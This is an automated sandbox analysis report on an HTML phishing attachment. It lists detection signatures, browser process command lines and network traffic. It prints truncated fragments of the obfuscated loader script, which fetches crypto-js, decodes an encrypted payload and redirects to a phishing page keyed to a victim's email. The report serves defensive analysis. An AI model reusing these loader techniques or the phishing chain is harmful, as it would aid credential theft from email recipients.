Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance_Regulvar.htm

Overview

General Information

Sample name:Remittance_Regulvar.htm
Analysis ID:1529327
MD5:8900e6a2d46556db4ba0473bca53e998
SHA1:8e61705c3941499775be2098ec9db7c12aa446bf
SHA256:29950e5595fbb6c398c59b3f9c95296c1b89db12d1dba555b6671dfb08caf0f1
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected landing page (webpage, office document or email)
HTML document with suspicious name
HTML document with suspicious title
Connects to many different domains
Detected non-DNS traffic on DNS port
Executes massive DNS lookups (> 100)
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
HTML page contains string obfuscation
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Remittance_Regulvar.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,9857401781913003249,9453999755188158547,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4012 --field-trial-handle=1996,i,9857401781913003249,9453999755188158547,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Remittance_Regulvar.htmTab title: Remittance_Regulvar.htm
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: Total embedded SVG size: 137625
Source: https://ortkn.lovationyme.com/5wLmN/#E#Mfmassicotte@regulvar.comHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20SREF6k%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: https://9be7ae48223ce0550e997a9119312c4c.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.htmlHTTP Parser: Found new string: script (function() {var u = 'https://googleads.g.doubleclick.net/dbm/ad?dbm_c=AKAmf-Dm6Ky-ZLzN1vL0mfoZm_3jHiN6LveZNo_ljEa61iE_rmT2GPCfvCnWDCOHU5IkESwIEEkxoeAaj8SjE6mjSo9Fjw0EypZCroJ7vnRQwjsVuOLXzctXvRIw8Bt3eqGE351O2BgldNPIz07KOwIZByNYtj2faW3ep_kzkbSDGWWR-httUzgFv3RiTr62Fx3Ahk8pdjG-UrXiLBplcc1vU3BfsfF4LvaA2GELgArYOSAWS0_CVGykrik_WaIEoEbRUk8UkZx0&cry=1&dbm_d=AKAmf-CtcYECbQrcleornIViCiff0eDTavRo-DrAGDOSPWjYyxU7RXaw3HblHyNHx_N9YdPVou8dx5V3D5xmc9YRPGQIqfhUAqurgXnV_AySJxoARFr5KYx-O5vF5_3RpuGnZjhgWgfRl61svTPZv1wLvKRP4GyRIQ2QH139M0gpP2v-tsaQjeTVdFSofNq5qxlgwXFsNpEn8kMpqUxcJU9hza2abKByp-Sh1THbeuyiNL9h4f2N4eVlTVsLXZXOzc-bmSlLjP3PO1x6o8s55TfTBQLRzCwJXF_w882MTfU_y4JFPSxZPwl-CAvgFPs_p-jtnCJO6L1EM6AQl8uTYy_tA6MDCAHVmDLGn1Ed4lF-X8QtVJhZAq5EI_df2dvFQ-2119pTxcbKVMKG-T0w9PgdyEYCSk-RFBPmCAoewDrCiffB5TOYxo58UXcUlKO3fqh_eg2JtvpVY2HjJgV_zHRSScFn-YJuscqHuY7QSJHulBmr1l6SZoPsSolJ2h2ZAmow59ofBfctm2b5HrH6PaPN_kZgATmbyYXGEl9ddWTj58N2DP8kEp9BlIoKOV-B7pUA6-f8MTx07DV8v-zt6U2ZXpFHVL0g1zBNaY_GOOVoBec4vrjRn1KH32rFYCCrmAFR4vnNNK_YIjH4TEDRBYvTRsXvBx5o...
Source: file:///C:/Users/user/Desktop/Remittance_Regulvar.htmHTTP Parser: Found new string: script document[elm] /* capybara */( termite + dragonfly + '></sc' + 'ript>') ;...
Source: https://mollysirishpub-tol.com/res444.php?2-68747470733a2f2f6f72746b6e2e6c6f766174696f6e796d652e636f6d2f35774c6d4e2f-cuckooHTTP Parser: var sfsbazajuszzbnny = document.createelement("script");sfsbazajuszzbnny.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(sfsbazajuszzbnny);sfsbazajuszzbnny.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiy05sz203clbyewjyvu1uwlwvouxom09ss1wvaxrmvfq1ne5kvhnsnnjjeepgseruzzdtzenzt3jjzjlpundonujemxywduu0wfjitgt3yzvyt3lxog11mvpqdnvyuug4twxoc2j5kythtup1ztrmywtxb2xlze9wbjrhvtf6wld3z253qmjrq1pncfwvxc9paxjzewjoadruvthbrguxmzgzrk4wa0crv00wofdun1deu244otdzxc9rbxpswdlvufq1oecxstduohrrmlgxeklnwusxoelzag5cl2mzytgwv2jrovo5tfjywldnu1vhswgzylhwohpfdk9jymy4exbtsdf3nkpqznm5wupik1niyk5ca0qxbffycvlhstfck05knxrdq0qxofraotvssue5b2h1udkybhptzgrlbkzyyldkchc2c2xksmflmtb0sg5hdhztmlfwbdfra3yyvitjunnyedjlb1zvcwf0ytrjz0jjmmpkyw5nugp1zwy4dzhvufcydwdboui3owddq1awafwvsjfydhvvy2lvzlyxmllfeuhqcff5um9samw5txbqutbyqw5kk3budmdcl1nudfi0m21kcwx2vkjjtgtobknrvkr0c1lttwlkoeryue5xxc9gbkvwv09hutffyvnkrwhzuzvgm0jkblvytnrcl1bkum9noetlvwfitktlqwdocxftymx5yuk2qufhznroww...
Source: Remittance_Regulvar.htmHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Regulvar.htmHTTP Parser: No favicon
Source: https://ortkn.lovationyme.com/5wLmN/#E#Mfmassicotte@regulvar.comHTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: https://finance.yahoo.com/markets/crypto/all/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:51298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:51306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:51421 version: TLS 1.2
Source: Binary string: </h2><p>If you have trees in your yard, they probably need a bit of pruning. Certain varieties even require it to stay healthy throughout the year. Compared with a pair of traditional pruning shears, this little chain saw makes the job practically effortless.</p><p>This chain saw is only 4 inches long. There's a safety lock that has to be pressed before the saw activates, and it comes with a handy carrying case, so you can safely store the device when it's not in use. The battery is a 20-volt, 1500mAh rechargeable. It can still get bogged down when cutting particularly thick branches, but it's sufficient for most jobs.</p><figure class=caas-figure><div class=caas-figure-with-pb style=\"max-height: 643px\"><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader\" style=padding-bottom:67% data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/OoOuQxAcGt9m08zoj.PDbA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA7aD0xNjA2/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d><a class=\"link rapid-noclick-resp\" href=https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&pageId=1p-autolink&featureId=text-link&merchantName=Amazon&custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL1Nha2VyLUNoYWluc2F3LVBvcnRhYmxlLUNvdXJ0eWFyZC0yMFZCYXR0ZXJpZXMvZHAvQjA5NDdYTFdGVz90YWc9eWxlMDEtMjAiLCJjb250ZW50VXVpZCI6IjEwNzJiMjc4LWY3ODgtNDVhZS05ZTJmLWUxNzMyZjEyYmNkZSIsIm9yaWdpbmFsVXJsIjoiaHR0cHM6Ly93d3cuYW1hem9uLmNvbS9TYWtlci1DaGFpbnNhdy1Qb3J0YWJsZS1Db3VydHlhcmQtMjBWQmF0dGVyaWVzL2RwL0IwOTQ3WExXRlciLCJkeW5hbWljQ2VudHJhbFRyYWNraW5nSWQiOnRydWUsInNpdGVJZCI6InVzLWxpZmVzdHlsZSIsInBhZ2VJZCI6IjFwLWF1dG9saW5rIiwiZmVhdHVyZUlkIjoidGV4dC1saW5rIn0&signature=AQAAAbFZgsqZ0PH-60AQLrHZ0lVvAb3chxGKmJB9ahDTkHjj&gcReferrer=https%3A%2F%2Fwww.amazon.com%2FSaker-Chainsaw-Portable-Courtyard-20VBatteries%2Fdp%2FB0947XLWFW data-ylk><img class=\"caas-img caas-lazy\" alt=\"Saker mini chain saw\" data-src=https://s.yimg.com/ny/api/res/1.2/6TxsUd3WQjVTMdz9sjYoYw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTY0Mw--/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d><noscript><img alt=\"Saker mini chain saw\" src=https://s.yimg.com/ny/api/res/1.2/6TxsUd3WQjVTMdz9sjYoYw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTY0Mw--/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d class=caas-img></noscript></a></div></div></div><div class=\"caption-wrapper caption-aligned-with-image\"><figcaption class=caption-collapse>Axe yourself: Wouldn't it be nice to branch out to a new world of (literally) handy power tools with this chain saw? (Amazon)<span class=caption-credit> (Amazon)</span></figcaption></div></figure><h2>What reviewers say source: chromecache_901.2.dr
Source: unknownNetwork traffic detected: DNS query count 243
Source: global trafficTCP traffic: 192.168.2.4:51043 -> 1.1.1.1:53
Source: global trafficDNS traffic detected: number of DNS queries: 243
Source: Joe Sandbox ViewIP Address: 91.228.74.200 91.228.74.200
Source: Joe Sandbox ViewIP Address: 74.6.160.107 74.6.160.107
Source: Joe Sandbox ViewIP Address: 185.89.210.153 185.89.210.153
Source: Joe Sandbox ViewIP Address: 74.6.160.106 74.6.160.106
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 124.146.153.152
Source: unknownTCP traffic detected without corresponding DNS query: 164.132.25.181
Source: unknownTCP traffic detected without corresponding DNS query: 164.132.25.181
Source: unknownTCP traffic detected without corresponding DNS query: 164.132.25.181
Source: unknownTCP traffic detected without corresponding DNS query: 164.132.25.181
Source: unknownTCP traffic detected without corresponding DNS query: 164.132.25.181
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f6f72746b6e2e6c6f766174696f6e796d652e636f6d2f35774c6d4e2f-cuckoo HTTP/1.1Host: mollysirishpub-tol.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f6f72746b6e2e6c6f766174696f6e796d652e636f6d2f35774c6d4e2f-cuckoo HTTP/1.1Host: mollysirishpub-tol.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5wLmN/ HTTP/1.1Host: ortkn.lovationyme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/62ec4f065604/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/62ec4f065604/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ortkn.lovationyme.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
